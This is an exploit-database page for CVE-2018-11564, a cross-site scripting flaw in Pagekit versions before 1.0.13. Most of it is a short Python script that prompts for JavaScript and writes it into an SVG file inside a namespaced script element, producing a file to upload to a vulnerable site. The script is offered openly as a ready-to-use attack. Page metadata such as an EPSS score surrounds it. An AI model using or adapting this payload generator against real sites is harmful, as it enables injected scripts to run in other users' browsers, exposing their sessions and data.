Lucene search

K
zdtDEEPIN21337DAY-ID-30543
HistoryJun 06, 2018 - 12:00 a.m.

Pagekit < 1.0.13 - Cross-Site Scripting Code Generator Exploit

2018-06-0600:00:00
DEEPIN2
0day.today
18

EPSS

0.002

Percentile

55.2%

Exploit for php platform in category web applications

# Title: Pagekit < 1.0.13 - Cross-Site Scripting Code Generator
# Author : DEEPIN2
# Vendor: Pagekit
# Sotware: https://pagekit.com/
# Version: < 1.0.13
# CVE: 2018-11564
# python3 required
 
def makesvg(name, code):
    code = '<exploit:script xmlns:exploit="http://www.w3.org/1999/xhtml">' + code + '</exploit:script>'
    f = open(name, 'w+')
    f.write(code)
    f.close
 
 
if __name__ == '__main__':
    print('''
  ______     _______     ____   ___  _  ___        _ _ ____   __   _  _   
 / ___\ \   / / ____|   |___ \ / _ \/ |( _ )      / / | ___| / /_ | || |  
| |    \ \ / /|  _| _____ __) | | | | |/ _ \ _____| | |___ \| '_ \| || |_ 
| |___  \ V / | |__|_____/ __/| |_| | | (_) |_____| | |___) | (_) |__   _|
 \____|  \_/  |_____|   |_____|\___/|_|\___/      |_|_|____/ \___/   |_|  
    [*] Author : DEEPIN2(Junseo Lee)''')
    print('[*] enter name without extension, ex) test.svg -> test')
    filename = input('Filename : ') + '.svg'
    print('[*] If you want to use alert(), type "alert("bla..bla..")"')
    scriptcode = input('Script code : ')
    try:
        makesvg(filename, scriptcode)
        print('[+] Successfully make venom file "%s"' %filename)
    except Error as e:
        print(e)

#  0day.today [2018-06-06]  #

EPSS

0.002

Percentile

55.2%